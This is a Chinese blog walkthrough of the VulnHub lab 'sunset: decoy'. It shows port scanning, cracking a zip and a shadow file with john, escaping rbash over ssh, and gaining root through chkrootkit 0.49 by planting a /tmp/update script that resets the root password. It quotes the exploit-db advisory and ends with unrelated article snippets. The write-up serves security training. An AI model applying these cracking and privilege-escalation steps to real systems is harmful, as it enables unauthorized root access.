vulnhub靶机-sunset:decoy_hash pkzip2$3*2*1*0*_cr4ke3的博客-程序员资料
技术标签: vulnhub靶机
1、找到靶机ip:192.168.0.129
nmap -sn 192.168.0.0/24
2、扫描靶机端口,除了22、80是开放状态,其他几个都是过滤状态
[email protected]:~# nmap -p- -A 192.168.0.129
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.129
Host is up (0.0057s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a9:b5:3e:3b:e3:74:e4:ff:b6:d5:9f:f1:81:e7:a4:4f (RSA)
| 256 ce:f3:b3:e7:0e:90:e2:64:ac:8d:87:0f:15:88:aa:5f (ECDSA)
|_ 256 66:a9:80:91:f3:d8:4b:0a:69:b0:00:22:9f:3c:4c:5a (ED25519)
80/tcp open http Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| 3.0K 2020-07-07 16:36 save.zip
|_
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
3986/tcp filtered mapper-ws_ethd
3990/tcp filtered bv-is
9603/tcp filtered unknown
37935/tcp filtered unknown
63217/tcp filtered unknown
MAC Address: 08:00:27:76:C4:0E (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=7/20%OT=22%CT=1%CU=33838%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5F14F065%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 5.71 ms 192.168.0.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.47 seconds
3、访问80端口,是一个压缩包
但是解压需要密码,使用字典暴力破解,多种方法
第一种方法:直接使用fcrackzip命令
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt save.zip
第二种方法:先使用zip2john命令提取压缩包的hash值,然后使用john进行字典爆破
[email protected]:~# zip2john save.zip > save.hash
ver 2.0 efh 5455 efh 7875 save.zip/etc/passwd PKZIP Encr: 2b chk, TS_chk, cmplen=668, decmplen=1807, crc=B3ACDAFE
ver 2.0 efh 5455 efh 7875 save.zip/etc/shadow PKZIP Encr: 2b chk, TS_chk, cmplen=434, decmplen=1111, crc=E11EC139
ver 2.0 efh 5455 efh 7875 save.zip/etc/group PKZIP Encr: 2b chk, TS_chk, cmplen=460, decmplen=829, crc=A1F81C08
ver 2.0 efh 5455 efh 7875 save.zip/etc/sudoers PKZIP Encr: 2b chk, TS_chk, cmplen=368, decmplen=669, crc=FF05389F
ver 2.0 efh 5455 efh 7875 save.zip/etc/hosts PKZIP Encr: 2b chk, TS_chk, cmplen=140, decmplen=185, crc=DFB905CD
ver 1.0 efh 5455 efh 7875 save.zip/etc/hostname PKZIP Encr: 2b chk, TS_chk, cmplen=45, decmplen=33, crc=D9C379A9
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
[email protected]:~# cat save.hash
save.zip:$pkzip2$3*2*1*0*8*24*a1f8*8d07*7d51a96d3e3fa4083bbfbe90ee97ddba1f39f769fcf1b2b6fd573fdca8c97dbec5bc9841*1*0*8*24*b3ac*90ab*f7fe58aeaaa3c46c54524ee024bd38dae36f3110a07f1e7aba266acbf8b5ff0caf42e05e*2*0*2d*21*d9c379a9*9b9*46*0*2d*d9c3*8ce8*aae40dfa55b72fd591a639c8c6d35b8cabd267f7edacb40a6ddf1285907b062c99ec6cc8b55d9f0027f553a44f*$/pkzip2$::save.zip:etc/hostname, etc/group, etc/passwd:save.zip
[email protected]:~# john --wordlist=/usr/share/wordlists/rockyou.txt save.hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
manuel (save.zip)
1g 0:00:00:00 DONE (2020-07-20 15:01) 12.50g/s 2400p/s 2400c/s 2400C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed
[email protected]:~# unzip save.zip
Archive: save.zip
[save.zip] etc/passwd password: manuel(不可见)
inflating: etc/passwd
inflating: etc/shadow
inflating: etc/group
inflating: etc/sudoers
inflating: etc/hosts
extracting: etc/hostname
[email protected]:~#
其他方法:可以网上找工具,或者找脚本代码进行破解
4、发现有shadow文件,使用john命令爆破一下密码,爆出一个用户的,另一个root应该是不会爆出来的
[email protected]:~# cd etc/
[email protected]:~/etc# ls
group hostname hosts passwd shadow sudoers
[email protected]:~/etc# john --wordlist=/usr/share/wordlists/rockyou.txt shadow
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
server (296640a3b825115a47b68fc44501c828)5、使用用户名和密码ssh登录,但是是一个rbash--受限制的shell,导致很多命令不能执行
[email protected]:~/etc# ssh [email protected]
The authenticity of host '192.168.0.129 (192.168.0.129)' can't be established.
ECDSA key fingerprint is SHA256:XcSxTQWk9o60DynaXNIL8HbB93NqEyqofs1B2EORdEE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.0.129' (ECDSA) to the list of known hosts.
[email protected]'s password: server(不可见)
Linux 60832e9f188106ec5bcc4eb7709ce592 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jul 7 16:45:50 2020 from 192.168.1.162
-rbash: dircolors: command not found
[email protected]2:~$ whoami
-rbash: whoami: command not found
[email protected]2:~$ id
uid=1000(296640a3b825115a47b68fc44501c828) gid=1000(296640a3b825115a47b68fc44501c828) groups=1000(296640a3b825115a47b68fc44501c828)
[email protected]2:~$ cat
-rbash: cat: command not found
6、ssh连接时添加-t "bash --noprofile"即可bybass,然后再添加环境变量即可,拿到第一个flag
[email protected]:~/etc# ssh [email protected] -t "bash --noprofile"
[email protected]'s password: server(不可见)
bash: dircolors: command not found
[email protected]2:~$ echo $PATH
PATH:/home/296640a3b825115a47b68fc44501c828/
[email protected]2:~$ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[email protected]2:~$ whoami
296640a3b825115a47b68fc44501c828
[email protected]2:~$ cat user.txt
35253d886842075b2c6390f35946e41f
[email protected]2:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[email protected]2:~$
7、在家目录下发现有权限访问的就只有SV-502目录,在里面发现一个logs\log.txt文件
[email protected]2:~$ ls -l
total 32
-rwxr-xr-x 1 root root 17480 Jul 7 16:19 honeypot.decoy
-rw------- 1 root root 1855 Jul 7 16:19 honeypot.decoy.cpp
lrwxrwxrwx 1 root root 7 Jun 27 18:32 id -> /bin/id
lrwxrwxrwx 1 root root 13 Jun 27 18:32 ifconfig -> /bin/ifconfig
lrwxrwxrwx 1 root root 7 Jun 27 18:32 ls -> /bin/ls
lrwxrwxrwx 1 root root 10 Jun 27 18:31 mkdir -> /bin/mkdir
drwxr-xr-x 3 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4096 Jun 27 18:59 SV-502
-rwxrwxrwx 1 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 33 Jul 7 17:06 user.txt
[email protected]2:~$ cat honeypot.decoy.cpp
cat: honeypot.decoy.cpp: Permission denied
[email protected]2:~$ cd SV-502/
[email protected]2:~/SV-502$ ls
fich logs
[email protected]2:~/SV-502$ cd logs/
[email protected]2:~/SV-502/logs$ ls
log.txt
查看之后是一个pspy64运行日志,有一条有用的信息
这个chkrootkit0.49是存在本地提权漏洞的,网上有很多利用文章,但是需要运行chkrootkit,日志文件中是没有的,前面家目录下还有一个honeypot.decoy是有运行权限的,运行之后有8个选项,其他七个都没什么用,第五个会启动一个AV SCAN,这个应该就是启动chkrootkit了
[email protected]:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
[email protected]2:~$ 下载pspy64到靶机上验证一下,发现chkrootkit已经以root身份(uid=0)运行
接下来就是提权了,关于这个服务的漏洞,kali也有描述:用一个普通用户在/tmp文件夹下新建一个可执行文件update,然后运行带漏洞的chkrootkit,那么这个文件会被以root的身份执行
[email protected]:~# searchsploit chkrootkit
-------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------- ---------------------------------
Chkrootkit - Local Privilege Escalation (Metasploit) | linux/local/38775.rb
Chkrootkit 0.49 - Local Privilege Escalation | linux/local/33899.txt
-------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
[email protected]:~# searchsploit -p 33899
Exploit: Chkrootkit 0.49 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/33899
Path: /usr/share/exploitdb/exploits/linux/local/33899.txt
File Type: ASCII text, with CRLF line terminators
[email protected]:~# cat /usr/share/exploitdb/exploits/linux/local/33899.txt
We just found a serious vulnerability in the chkrootkit package, which
may allow local attackers to gain root access to a box in certain
configurations (/tmp not mounted noexec).
The vulnerability is located in the function slapper() in the
shellscript chkrootkit:
#
# SLAPPER.{A,B,C,D} and the multi-platform variant
#
slapper (){
SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"
SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \
${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a
SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "
OPT=-an
STATUS=0
file_port=
if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">
/dev/null 2>&1
then
STATUS=1
[ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \
$egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |
tr -d :`
fi
for i in ${SLAPPER_FILES}; do
if [ -f ${i} ]; then
file_port=$file_port $i
STATUS=1
fi
done
if [ ${STATUS} -eq 1 ] ;then
echo "Warning: Possible Slapper Worm installed ($file_port)"
else
if [ "${QUIET}" != "t" ]; then echo "not infected"; fi
return ${NOT_INFECTED}
fi
}
The line 'file_port=$file_port $i' will execute all files specified in
$SLAPPER_FILES as the user chkrootkit is running (usually root), if
$file_port is empty, because of missing quotation marks around the
variable assignment.
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
Result: The file /tmp/update will be executed as root, thus effectively
rooting your box, if malicious content is placed inside the file.
If an attacker knows you are periodically running chkrootkit (like in
cron.daily) and has write access to /tmp (not mounted noexec), he may
easily take advantage of this.
Suggested fix: Put quotation marks around the assignment.
file_port="$file_port $i"
I will also try to contact upstream, although the latest version of
chkrootkit dates back to 2009 - will have to see, if I reach a dev there.这里两种方法
第一种:写入反弹shell一句话,给执行权限,本地监听,拿到最终flag
第二种:直接写入修改root一句话(不太推荐),然直接切换到root用户
[email protected]2:~$ echo 'echo "root:123456" | sudo chpasswd' > /tmp/update
[email protected]2:~$ chmod 777 /tmp/update
[email protected]2:~$ su - root
Password: 123456(不可见)
[email protected]:~#
8、参考文章
https://0xatom.github.io/vulnhub/2020/07/10/sunsetdecoy/
https://www.hackingarticles.in/sunset-decoy-vulnhub-walkthrough/
这个系列靶机的博客就先暂停了!
智能推荐
pycharm中连接服务器远程调试代码_pycham连接远程调试_remanented的博客-程序员资料
首先需要安装和破解一个profession的pycharm,我是按照博客pycharm安装及其破解教程来安装的2017版,亲测有效。接下来就是进行pycharm的服务器连接了:1. 先找到tool里面的configuration 在connection底下需要填写SFTP host,...
宏定义中的##操作符和... and _ _VA_ARGS_ __#define send_cell_msg(...) get_macro(__va_args__, _args_的博客-程序员资料
1.Preprocessor Glue: The ## Operator预处理连接符:##操作符Like the # operator, the ## operator can be used in the replacement section of a function-like macro.Additionally, it can be used in the repla
spring jms + activemq + maven搭建_Holi的博客-程序员资料
1. 去activemq官网下载:https://www.baidu.com/link?url=-KVJT1OInPSjikOJs6Lt7K6AA7oGruc_iUR9nw2gUjCQ5sc0lcfqaOtJhCcauT-z&wd=&eqid=c7d778a8000d24a60000000656ea1f1a2. 进入bin目录双击activemq.bat启动mq这样表示启动
中级—Windbg symbol 问题_smtlg的博客-程序员资料
在Windbg敲命令!process出现如下错误:kd> !processNT symbols are incorrect, please fix symbols-----------------------------------------------------------------------解决方法:按如下步骤敲命令即可kd> .sympath SRVD:\WinDDK\Symbols_mshttp://msdl.microsoft.com/download/symbol
/boot独立分区扩容,解决/boot空间不足问题_boot空间不足怎么办_清风丶腾云的博客-程序员资料
前言装Ubuntu系统时,/boot分区只给了300M,之后由于/boot空间不足导致更新系统失败。下面是解决方案。参考链接https://blog.sciencenet.cn/blog-747197-772653.html操作步骤用Ubuntu自带disk查看/boot分区配置点击/boot分区下面小齿轮图标,选择Edit Mount Options,记下/boot分区配置,点击后界面如下:然后把"Mount at startup"取消,把“Mount point”改一下,比如/boo
JAVA7所有版本下载地址 JRE jre jdk JDK_zt3871的博客-程序员资料
http://www.oracle.com/technetwork/java/javase/downloads/java-archive-downloads-javase7-521261.html
随便推点
Word控件Spire.Doc 转换教程(十九): 在 C#、VB.NET 中将 RTF 转换为 PDF_spire doc把pdf转成rtf_爱分享的小妮子的博客-程序员资料
即使在第三方程序集的帮助下,RTF 到 PDF 的转换也不是一件容易的事,因为它们中的大多数不支持直接加载带有 .rtf 扩展名的文件。但是,您可以在本节中的应用程序中轻松地将 RTF 转换为 PDF,因为只使用了三行代码。Spire.Doc for.NET 最新下载Spire.Doc for .NET是一个 .NET Word 组件,使您可以直接加载带有 .rtf 扩展名的文件,然后在 C#、VB.NET 中将 RTF 转换为 PDF。目标 PDF 与原始 RTF 文件一样清晰。下面是目标PDF.
JavaWeb后端代码自动生成工具V2.0.0_run-auth.bat_嫒de洫天使的博客-程序员资料
工具介绍背景介绍@Author:yuxue{个人业余开发项目,主要是为了解决我个人,在开软件开发工作中遇到的一些头疼问题}问题1:各种密码太多,记不住问题2:系统太多,环境太多,看着都头疼,要用的时候找半天问题3:javaweb项目,基础的CRUD(增查改删)操作,都是重复性的,没啥技术含量,写起来就是浪费时间问题4:工作笔记、学习笔记整理,网上好的工具收费,不收费的工具不好用...
零基础入门语义分割-地表建筑物识别 Task3 语义分割模型发展-学习笔记_菊头蝙蝠的博客-程序员资料
零基础入门语义分割-地表建筑物识别 Task3 语义分割模型发展-学习笔记3 语义分割模型发展3.1 学习目标3.2 FCN3.3 SegNet3.4 Unet3.5 DeepLab3.6 RefineNet3.7 PSPNet3.8 基于全卷积的GAN语义分割模型3.9 具体调用3.9 本章小结3.10 课后作业3 语义分割模型发展语义分割(全像素语义分割)作为经典的计算机视觉任务(图像分类,物体识别检测,语义分割)。其结合了图像分类、目标检测和图像分割,通过一定的方法将图像分割成具有一定语义含义的区
高德地图API_主沉浮的博客-程序员资料
最近在学习高德地图api接口调用,需要获取场景的一些信息,最重要的是获取轮廓图需要的接口基本都有 轮廓图的接口没有获取基本信息https://lbs.amap.com/api/webservice/summary/查找到自己需要的接口并调用public static string GetDataByWhere(string city,string type,int of...
npm的node-uuid和uuid_npm uuid_上山老人的博客-程序员资料
文章目录uuid功能uuid模块用法node-uuid模块小结参考uuid功能生成唯一的一个字符串至于唯一性,我也怀疑过,参考[1],主要有5种用法(1)基于时间的(2)DCE安全的(3)基于名字的(4)随机的(5)基于名字的(SHA1)uuid模块用法参考[1],有5种用法v1:基于时间的> uuid.v1()'3be65050-3a6c-11ea-9...
Android中CursorAdapter的使用详解_奋斗之路的博客-程序员资料
低调是最牛逼的炫耀!!